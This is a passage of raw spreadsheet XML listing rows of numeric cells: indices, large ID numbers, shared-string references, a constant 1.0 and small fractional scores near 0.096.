        <v>4.7836312E7</v>
      </c>
      <c r="C32909" s="2" t="s">
        <v>31677</v>
      </c>
      <c r="D32909" s="2">
        <v>1.0</v>
      </c>
      <c r="E32909" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32909" s="2">
        <v>0.09649122807017543</v>
      </c>
    </row>
    <row r="32910" ht="15.75" customHeight="1">
      <c r="A32910" s="1">
        <v>32674.0</v>
      </c>
      <c r="B32910" s="2">
        <v>5942495.0</v>
      </c>
      <c r="C32910" s="2" t="s">
        <v>31678</v>
      </c>
      <c r="D32910" s="2">
        <v>1.0</v>
      </c>
      <c r="E32910" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32910" s="2">
        <v>0.09649122807017543</v>
      </c>
    </row>
    <row r="32911" ht="15.75" customHeight="1">
      <c r="A32911" s="1">
        <v>13583.0</v>
      </c>
      <c r="B32911" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C32911" s="2" t="s">
        <v>31679</v>
      </c>
      <c r="D32911" s="2">
        <v>1.0</v>
      </c>
      <c r="E32911" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32911" s="2">
        <v>0.09635416666666666</v>
      </c>
    </row>
    <row r="32912" ht="15.75" customHeight="1">
      <c r="A32912" s="1">
        <v>12296.0</v>
      </c>
      <c r="B32912" s="2">
        <v>2.8279239E7</v>
      </c>
      <c r="C32912" s="2" t="s">
        <v>31680</v>
      </c>
      <c r="D32912" s="2">
        <v>1.0</v>
      </c>
      <c r="E32912" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32912" s="2">
        <v>0.09623015873015874</v>
      </c>
    </row>
    <row r="32913" ht="15.75" customHeight="1">
      <c r="A32913" s="1">
        <v>1505.0</v>
      </c>
      <c r="B32913" s="2">
        <v>2.7302109E7</v>
      </c>
      <c r="C32913" s="2" t="s">
        <v>31681</v>
      </c>
      <c r="D32913" s="2">
        <v>1.0</v>
      </c>
      <c r="E32913" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32913" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="32914" ht="15.75" customHeight="1">
      <c r="A32914" s="1">
        <v>11993.0</v>
      </c>
      <c r="B32914" s="2">
        <v>2.5910858E7</v>
      </c>
      <c r="C32914" s="2" t="s">
        <v>31682</v>
      </c>
      <c r="D32914" s="2">
        <v>1.0</v>
      </c>
      <c r="E32914" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32914" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="32915" ht="15.75" customHeight="1">
      <c r="A32915" s="1">
        <v>7347.0</v>
      </c>
      <c r="B32915" s="2">
        <v>5.0979342E7</v>
      </c>
      <c r="C32915" s="2" t="s">
        <v>31683</v>
      </c>
      <c r="D32915" s="2">
        <v>1.0</v>
      </c>
      <c r="E32915" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32915" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="32916" ht="15.75" customHeight="1">
      <c r="A32916" s="1">
        <v>7742.0</v>
      </c>
      <c r="B32916" s="2">
        <v>5.2053004E7</v>
      </c>
      <c r="C32916" s="2" t="s">
        <v>31684</v>
      </c>
      <c r="D32916" s="2">
        <v>1.0</v>
      </c>
      <c r="E32916" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32916" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="32917" ht="15.75" customHeight="1">
      <c r="A32917" s="1">
        <v>16746.0</v>
      </c>
      <c r="B32917" s="2">
        <v>4.7583896E7</v>
      </c>
      <c r="C32917" s="2" t="s">
        <v>31685</v>
      </c>
      <c r="D32917" s="2">
        <v>1.0</v>
      </c>
      <c r="E32917" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32917" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="32918" ht="15.75" customHeight="1">
      <c r="A32918" s="1">
        <v>27451.0</v>
      </c>
      <c r="B32918" s="2">
        <v>2.1985098E7</v>
      </c>
      <c r="C32918" s="2" t="s">
        <v>31686</v>
      </c>
      <c r="D32918" s="2">
        <v>1.0</v>
      </c>
      <c r="E32918" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32918" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="32919" ht="15.75" customHeight="1">
      <c r="A32919" s="1">
        <v>28074.0</v>
      </c>
      <c r="B32919" s="2">
        <v>2.4628951E7</v>
      </c>
      <c r="C32919" s="2" t="s">
        <v>31687</v>
      </c>
      <c r="D32919" s="2">
        <v>1.0</v>
      </c>
      <c r="E32919" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32919" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="32920" ht="15.75" customHeight="1">
      <c r="A32920" s="1">
        <v>32856.0</v>
      </c>
      <c r="B32920" s="2">
        <v>6269981.0</v>
      </c>
      <c r="C32920" s="2" t="s">
        <v>31688</v>
      </c>
      <c r="D32920" s="2">
        <v>1.0</v>
      </c>
      <c r="E32920" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32920" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="32921" ht="15.75" customHeight="1">
      <c r="A32921" s="1">
        <v>240.0</v>
      </c>
      <c r="B32921" s="2">
        <v>1.4906029E7</v>
      </c>
      <c r="C32921" s="2" t="s">
        <v>31689</v>
      </c>
      <c r="D32921" s="2">
        <v>1.0</v>
      </c>
      <c r="E32921" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32921" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="32922" ht="15.75" customHeight="1">
      <c r="A32922" s="1">
        <v>3793.0</v>
      </c>
      <c r="B32922" s="2">
        <v>3.995656E7</v>
      </c>
      <c r="C32922" s="2" t="s">
        <v>31690</v>
      </c>
      <c r="D32922" s="2">
        <v>1.0</v>
      </c>
      <c r="E32922" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32922" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="32923" ht="15.75" customHeight="1">
      <c r="A32923" s="1">
        <v>4583.0</v>
      </c>
      <c r="B32923" s="2">
        <v>4.277096E7</v>
      </c>
      <c r="C32923" s="2" t="s">
        <v>31691</v>
      </c>
      <c r="D32923" s="2">
        <v>1.0</v>
      </c>
      <c r="E32923" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32923" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="32924" ht="15.75" customHeight="1">
      <c r="A32924" s="1">
        <v>8822.0</v>
      </c>
      <c r="B32924" s="2">
        <v>5.4639343E7</v>
      </c>
      <c r="C32924" s="2" t="s">
        <v>31692</v>
      </c>
      <c r="D32924" s="2">
        <v>1.0</v>
      </c>
      <c r="E32924" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32924" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="32925" ht="15.75" customHeight="1">
      <c r="A32925" s="1">
        <v>15112.0</v>
      </c>
      <c r="B32925" s="2">
        <v>4.1844721E7</v>
      </c>
      <c r="C32925" s="2" t="s">
        <v>31693</v>
      </c>
      <c r="D32925" s="2">
        <v>1.0</v>
      </c>
      <c r="E32925" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32925" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="32926" ht="15.75" customHeight="1">
      <c r="A32926" s="1">
        <v>16506.0</v>
      </c>
      <c r="B32926" s="2">
        <v>4.6611548E7</v>
      </c>
      <c r="C32926" s="2" t="s">
        <v>31694</v>
      </c>
      <c r="D32926" s="2">
        <v>1.0</v>
      </c>
      <c r="E32926" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32926" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="32927" ht="15.75" customHeight="1">
      <c r="A32927" s="1">
        <v>33672.0</v>
      </c>
      <c r="B32927" s="2">
        <v>8425292.0</v>
      </c>
      <c r="C32927" s="2" t="s">
        <v>31695</v>
      </c>
      <c r="D32927" s="2">
        <v>1.0</v>
      </c>
      <c r="E32927" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32927" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="32928" ht="15.75" customHeight="1">
      <c r="A32928" s="1">
        <v>13462.0</v>
      </c>
      <c r="B32928" s="2">
        <v>3.5201419E7</v>
      </c>
      <c r="C32928" s="2" t="s">
        <v>31696</v>
      </c>
      <c r="D32928" s="2">
        <v>1.0</v>
      </c>
      <c r="E32928" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32928" s="2">
        <v>0.09595959595959593</v>
      </c>
    </row>
    <row r="32929" ht="15.75" customHeight="1">
      <c r="A32929" s="1">
        <v>21973.0</v>
      </c>
      <c r="B32929" s="2">
        <v>2.9170301E7</v>
      </c>
      <c r="C32929" s="2" t="s">
        <v>31697</v>
      </c>
      <c r="D32929" s="2">
        <v>1.0</v>
      </c>
      <c r="E32929" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32929" s="2">
        <v>0.09595959595959593</v>
      </c>
    </row>
    <row r="32930" ht="15.75" customHeight="1">
      <c r="A32930" s="1">
        <v>3124.0</v>
      </c>
      <c r="B32930" s="2">
        <v>3.6838057E7</v>
      </c>
      <c r="C32930" s="2" t="s">
        <v>31698</v>
      </c>
      <c r="D32930" s="2">
        <v>1.0</v>
      </c>
      <c r="E32930" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32930" s="2">
        <v>0.09595959595959591</v>
      </c>
    </row>
    <row r="32931" ht="15.75" customHeight="1">
      <c r="A32931" s="1">
        <v>31504.0</v>
      </c>
      <c r="B32931" s="2">
        <v>5.0692638E7</v>
      </c>
      <c r="C32931" s="2" t="s">
        <v>31699</v>
      </c>
      <c r="D32931" s="2">
        <v>1.0</v>
      </c>
      <c r="E32931" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32931" s="2">
        <v>0.09595959595959591</v>
      </c>
    </row>
    <row r="32932" ht="15.75" customHeight="1">
      <c r="A32932" s="1">
        <v>1959.0</v>
      </c>
      <c r="B32932" s="2">
        <v>3.0294803E7</v>
      </c>
      <c r="C32932" s="2" t="s">
        <v>31700</v>
      </c>
      <c r="D32932" s="2">
        <v>1.0</v>
      </c>
      <c r="E32932" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32932" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="32933" ht="15.75" customHeight="1">
      <c r="A32933" s="1">
        <v>2624.0</v>
      </c>
      <c r="B32933" s="2">
        <v>3.4515888E7</v>
      </c>
      <c r="C32933" s="2" t="s">
        <v>31701</v>
      </c>
      <c r="D32933" s="2">
        <v>1.0</v>
      </c>
      <c r="E32933" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32933" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="32934" ht="15.75" customHeight="1">
      <c r="A32934" s="1">
        <v>6267.0</v>
      </c>
      <c r="B32934" s="2">
        <v>4.8127189E7</v>
      </c>
      <c r="C32934" s="2" t="s">
        <v>31702</v>
      </c>
      <c r="D32934" s="2">
        <v>1.0</v>
      </c>
      <c r="E32934" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32934" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="32935" ht="15.75" customHeight="1">
      <c r="A32935" s="1">
        <v>11946.0</v>
      </c>
      <c r="B32935" s="2">
        <v>2.5554325E7</v>
      </c>
      <c r="C32935" s="2" t="s">
        <v>31703</v>
      </c>
      <c r="D32935" s="2">
        <v>1.0</v>
      </c>
      <c r="E32935" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32935" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="32936" ht="15.75" customHeight="1">
      <c r="A32936" s="1">
        <v>16161.0</v>
      </c>
      <c r="B32936" s="2">
        <v>4.5607755E7</v>
      </c>
      <c r="C32936" s="2" t="s">
        <v>31704</v>
      </c>
      <c r="D32936" s="2">
        <v>1.0</v>
      </c>
      <c r="E32936" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32936" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="32937" ht="15.75" customHeight="1">
      <c r="A32937" s="1">
        <v>16731.0</v>
      </c>
      <c r="B32937" s="2">
        <v>4.7506735E7</v>
      </c>
      <c r="C32937" s="2" t="s">
        <v>31705</v>
      </c>
      <c r="D32937" s="2">
        <v>1.0</v>
      </c>
      <c r="E32937" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32937" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="32938" ht="15.75" customHeight="1">
      <c r="A32938" s="1">
        <v>17634.0</v>
      </c>
      <c r="B32938" s="2">
        <v>5.0389556E7</v>
      </c>
      <c r="C32938" s="2" t="s">
        <v>31706</v>
      </c>
      <c r="D32938" s="2">
        <v>1.0</v>
      </c>
      <c r="E32938" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32938" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="32939" ht="15.75" customHeight="1">
      <c r="A32939" s="1">
        <v>18524.0</v>
      </c>
      <c r="B32939" s="2">
        <v>5.302192E7</v>
      </c>
      <c r="C32939" s="2" t="s">
        <v>31707</v>
      </c>
      <c r="D32939" s="2">
        <v>1.0</v>
      </c>
      <c r="E32939" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32939" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="32940" ht="15.75" customHeight="1">
      <c r="A32940" s="1">
        <v>19400.0</v>
      </c>
      <c r="B32940" s="2">
        <v>5.5578897E7</v>
      </c>
      <c r="C32940" s="2" t="s">
        <v>31708</v>
      </c>
      <c r="D32940" s="2">
        <v>1.0</v>
      </c>
      <c r="E32940" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32940" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="32941" ht="15.75" customHeight="1">
      <c r="A32941" s="1">
        <v>20538.0</v>
      </c>
      <c r="B32941" s="2">
        <v>1.3308407E7</v>
      </c>
      <c r="C32941" s="2" t="s">
        <v>31709</v>
      </c>
      <c r="D32941" s="2">
        <v>1.0</v>
      </c>
      <c r="E32941" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32941" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="32942" ht="15.75" customHeight="1">
      <c r="A32942" s="1">
        <v>24025.0</v>
      </c>
      <c r="B32942" s="2">
        <v>9400150.0</v>
      </c>
      <c r="C32942" s="2" t="s">
        <v>31710</v>
      </c>
      <c r="D32942" s="2">
        <v>1.0</v>
      </c>
      <c r="E32942" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32942" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="32943" ht="15.75" customHeight="1">
      <c r="A32943" s="1">
        <v>25713.0</v>
      </c>
      <c r="B32943" s="2">
        <v>1.4530134E7</v>
      </c>
      <c r="C32943" s="2" t="s">
        <v>31711</v>
      </c>
      <c r="D32943" s="2">
        <v>1.0</v>
      </c>
      <c r="E32943" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32943" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="32944" ht="15.75" customHeight="1">
      <c r="A32944" s="1">
        <v>29301.0</v>
      </c>
      <c r="B32944" s="2">
        <v>3.1239326E7</v>
      </c>
      <c r="C32944" s="2" t="s">
        <v>31712</v>
      </c>
      <c r="D32944" s="2">
        <v>1.0</v>
      </c>
      <c r="E32944" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32944" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="32945" ht="15.75" customHeight="1">
      <c r="A32945" s="1">
        <v>31964.0</v>
      </c>
      <c r="B32945" s="2">
        <v>5312569.0</v>
      </c>
      <c r="C32945" s="2" t="s">
        <v>31713</v>
      </c>
      <c r="D32945" s="2">
        <v>1.0</v>
      </c>
      <c r="E32945" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32945" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="32946" ht="15.75" customHeight="1">
      <c r="A32946" s="1">
        <v>33976.0</v>
      </c>
      <c r="B32946" s="2">
        <v>9400149.0</v>
      </c>
      <c r="C32946" s="2" t="s">
        <v>31710</v>
      </c>
      <c r="D32946" s="2">
        <v>1.0</v>
      </c>
      <c r="E32946" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32946" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="32947" ht="15.75" customHeight="1">
      <c r="A32947" s="1">
        <v>34183.0</v>
      </c>
      <c r="B32947" s="2">
        <v>9939900.0</v>
      </c>
      <c r="C32947" s="2" t="s">
        <v>31714</v>
      </c>
      <c r="D32947" s="2">
        <v>1.0</v>
      </c>
      <c r="E32947" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32947" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="32948" ht="15.75" customHeight="1">
      <c r="A32948" s="1">
        <v>133.0</v>
      </c>
      <c r="B32948" s="2">
        <v>1.3299291E7</v>
      </c>
      <c r="C32948" s="2" t="s">
        <v>31715</v>
      </c>
      <c r="D32948" s="2">
        <v>1.0</v>
      </c>
      <c r="E32948" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32948" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32949" ht="15.75" customHeight="1">
      <c r="A32949" s="1">
        <v>206.0</v>
      </c>
      <c r="B32949" s="2">
        <v>1.453457E7</v>
      </c>
      <c r="C32949" s="2" t="s">
        <v>31716</v>
      </c>
      <c r="D32949" s="2">
        <v>1.0</v>
      </c>
      <c r="E32949" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32949" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32950" ht="15.75" customHeight="1">
      <c r="A32950" s="1">
        <v>239.0</v>
      </c>
      <c r="B32950" s="2">
        <v>1.4867514E7</v>
      </c>
      <c r="C32950" s="2" t="s">
        <v>31717</v>
      </c>
      <c r="D32950" s="2">
        <v>1.0</v>
      </c>
      <c r="E32950" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32950" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32951" ht="15.75" customHeight="1">
      <c r="A32951" s="1">
        <v>283.0</v>
      </c>
      <c r="B32951" s="2">
        <v>1.5373952E7</v>
      </c>
      <c r="C32951" s="2" t="s">
        <v>31718</v>
      </c>
      <c r="D32951" s="2">
        <v>1.0</v>
      </c>
      <c r="E32951" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32951" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32952" ht="15.75" customHeight="1">
      <c r="A32952" s="1">
        <v>641.0</v>
      </c>
      <c r="B32952" s="2">
        <v>1.9840748E7</v>
      </c>
      <c r="C32952" s="2" t="s">
        <v>31719</v>
      </c>
      <c r="D32952" s="2">
        <v>1.0</v>
      </c>
      <c r="E32952" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32952" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32953" ht="15.75" customHeight="1">
      <c r="A32953" s="1">
        <v>664.0</v>
      </c>
      <c r="B32953" s="2">
        <v>2.0156128E7</v>
      </c>
      <c r="C32953" s="2" t="s">
        <v>31720</v>
      </c>
      <c r="D32953" s="2">
        <v>1.0</v>
      </c>
      <c r="E32953" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32953" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32954" ht="15.75" customHeight="1">
      <c r="A32954" s="1">
        <v>787.0</v>
      </c>
      <c r="B32954" s="2">
        <v>2.1206995E7</v>
      </c>
      <c r="C32954" s="2" t="s">
        <v>31721</v>
      </c>
      <c r="D32954" s="2">
        <v>1.0</v>
      </c>
      <c r="E32954" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32954" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32955" ht="15.75" customHeight="1">
      <c r="A32955" s="1">
        <v>986.0</v>
      </c>
      <c r="B32955" s="2">
        <v>2.2874777E7</v>
      </c>
      <c r="C32955" s="2" t="s">
        <v>31722</v>
      </c>
      <c r="D32955" s="2">
        <v>1.0</v>
      </c>
      <c r="E32955" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32955" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32956" ht="15.75" customHeight="1">
      <c r="A32956" s="1">
        <v>1221.0</v>
      </c>
      <c r="B32956" s="2">
        <v>2487911.0</v>
      </c>
      <c r="C32956" s="2" t="s">
        <v>31723</v>
      </c>
      <c r="D32956" s="2">
        <v>1.0</v>
      </c>
      <c r="E32956" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32956" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32957" ht="15.75" customHeight="1">
      <c r="A32957" s="1">
        <v>1613.0</v>
      </c>
      <c r="B32957" s="2">
        <v>2.7819515E7</v>
      </c>
      <c r="C32957" s="2" t="s">
        <v>31724</v>
      </c>
      <c r="D32957" s="2">
        <v>1.0</v>
      </c>
      <c r="E32957" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32957" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32958" ht="15.75" customHeight="1">
      <c r="A32958" s="1">
        <v>1825.0</v>
      </c>
      <c r="B32958" s="2">
        <v>2.9311268E7</v>
      </c>
      <c r="C32958" s="2" t="s">
        <v>31725</v>
      </c>
      <c r="D32958" s="2">
        <v>1.0</v>
      </c>
      <c r="E32958" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32958" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32959" ht="15.75" customHeight="1">
      <c r="A32959" s="1">
        <v>1946.0</v>
      </c>
      <c r="B32959" s="2">
        <v>3.0224371E7</v>
      </c>
      <c r="C32959" s="2" t="s">
        <v>31726</v>
      </c>
      <c r="D32959" s="2">
        <v>1.0</v>
      </c>
      <c r="E32959" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32959" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32960" ht="15.75" customHeight="1">
      <c r="A32960" s="1">
        <v>1979.0</v>
      </c>
      <c r="B32960" s="2">
        <v>3.0436496E7</v>
      </c>
      <c r="C32960" s="2" t="s">
        <v>31727</v>
      </c>
      <c r="D32960" s="2">
        <v>1.0</v>
      </c>
      <c r="E32960" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32960" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32961" ht="15.75" customHeight="1">
      <c r="A32961" s="1">
        <v>2194.0</v>
      </c>
      <c r="B32961" s="2">
        <v>3.1982977E7</v>
      </c>
      <c r="C32961" s="2" t="s">
        <v>31728</v>
      </c>
      <c r="D32961" s="2">
        <v>1.0</v>
      </c>
      <c r="E32961" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32961" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32962" ht="15.75" customHeight="1">
      <c r="A32962" s="1">
        <v>2643.0</v>
      </c>
      <c r="B32962" s="2">
        <v>3.465576E7</v>
      </c>
      <c r="C32962" s="2" t="s">
        <v>31729</v>
      </c>
      <c r="D32962" s="2">
        <v>1.0</v>
      </c>
      <c r="E32962" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32962" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32963" ht="15.75" customHeight="1">
      <c r="A32963" s="1">
        <v>2672.0</v>
      </c>
      <c r="B32963" s="2">
        <v>3.4754668E7</v>
      </c>
      <c r="C32963" s="2" t="s">
        <v>31730</v>
      </c>
      <c r="D32963" s="2">
        <v>1.0</v>
      </c>
      <c r="E32963" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32963" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32964" ht="15.75" customHeight="1">
      <c r="A32964" s="1">
        <v>2695.0</v>
      </c>
      <c r="B32964" s="2">
        <v>3.4850588E7</v>
      </c>
      <c r="C32964" s="2" t="s">
        <v>31731</v>
      </c>
      <c r="D32964" s="2">
        <v>1.0</v>
      </c>
      <c r="E32964" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32964" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32965" ht="15.75" customHeight="1">
      <c r="A32965" s="1">
        <v>2703.0</v>
      </c>
      <c r="B32965" s="2">
        <v>3.48571E7</v>
      </c>
      <c r="C32965" s="2" t="s">
        <v>31732</v>
      </c>
      <c r="D32965" s="2">
        <v>1.0</v>
      </c>
      <c r="E32965" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32965" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32966" ht="15.75" customHeight="1">
      <c r="A32966" s="1">
        <v>2802.0</v>
      </c>
      <c r="B32966" s="2">
        <v>3.534645E7</v>
      </c>
      <c r="C32966" s="2" t="s">
        <v>31733</v>
      </c>
      <c r="D32966" s="2">
        <v>1.0</v>
      </c>
      <c r="E32966" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32966" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32967" ht="15.75" customHeight="1">
      <c r="A32967" s="1">
        <v>2929.0</v>
      </c>
      <c r="B32967" s="2">
        <v>3.5885869E7</v>
      </c>
      <c r="C32967" s="2" t="s">
        <v>31734</v>
      </c>
      <c r="D32967" s="2">
        <v>1.0</v>
      </c>
      <c r="E32967" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32967" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32968" ht="15.75" customHeight="1">
      <c r="A32968" s="1">
        <v>3438.0</v>
      </c>
      <c r="B32968" s="2">
        <v>3.8219513E7</v>
      </c>
      <c r="C32968" s="2" t="s">
        <v>31735</v>
      </c>
      <c r="D32968" s="2">
        <v>1.0</v>
      </c>
      <c r="E32968" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32968" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32969" ht="15.75" customHeight="1">
      <c r="A32969" s="1">
        <v>3444.0</v>
      </c>
      <c r="B32969" s="2">
        <v>3.8265687E7</v>
      </c>
      <c r="C32969" s="2" t="s">
        <v>31736</v>
      </c>
      <c r="D32969" s="2">
        <v>1.0</v>
      </c>
      <c r="E32969" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32969" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32970" ht="15.75" customHeight="1">
      <c r="A32970" s="1">
        <v>3948.0</v>
      </c>
      <c r="B32970" s="2">
        <v>4.0634947E7</v>
      </c>
      <c r="C32970" s="2" t="s">
        <v>31737</v>
      </c>
      <c r="D32970" s="2">
        <v>1.0</v>
      </c>
      <c r="E32970" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32970" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32971" ht="15.75" customHeight="1">
      <c r="A32971" s="1">
        <v>4398.0</v>
      </c>
      <c r="B32971" s="2">
        <v>4.2264358E7</v>
      </c>
      <c r="C32971" s="2" t="s">
        <v>31738</v>
      </c>
      <c r="D32971" s="2">
        <v>1.0</v>
      </c>
      <c r="E32971" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32971" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32972" ht="15.75" customHeight="1">
      <c r="A32972" s="1">
        <v>4662.0</v>
      </c>
      <c r="B32972" s="2">
        <v>4.3133642E7</v>
      </c>
      <c r="C32972" s="2" t="s">
        <v>31739</v>
      </c>
      <c r="D32972" s="2">
        <v>1.0</v>
      </c>
      <c r="E32972" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32972" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32973" ht="15.75" customHeight="1">
      <c r="A32973" s="1">
        <v>5160.0</v>
      </c>
      <c r="B32973" s="2">
        <v>4.4741848E7</v>
      </c>
      <c r="C32973" s="2" t="s">
        <v>31740</v>
      </c>
      <c r="D32973" s="2">
        <v>1.0</v>
      </c>
      <c r="E32973" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32973" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32974" ht="15.75" customHeight="1">
      <c r="A32974" s="1">
        <v>5518.0</v>
      </c>
      <c r="B32974" s="2">
        <v>4.5855214E7</v>
      </c>
      <c r="C32974" s="2" t="s">
        <v>31741</v>
      </c>
      <c r="D32974" s="2">
        <v>1.0</v>
      </c>
      <c r="E32974" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32974" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32975" ht="15.75" customHeight="1">
      <c r="A32975" s="1">
        <v>5680.0</v>
      </c>
      <c r="B32975" s="2">
        <v>4.6389046E7</v>
      </c>
      <c r="C32975" s="2" t="s">
        <v>31742</v>
      </c>
      <c r="D32975" s="2">
        <v>1.0</v>
      </c>
      <c r="E32975" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32975" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32976" ht="15.75" customHeight="1">
      <c r="A32976" s="1">
        <v>5744.0</v>
      </c>
      <c r="B32976" s="2">
        <v>4.662741E7</v>
      </c>
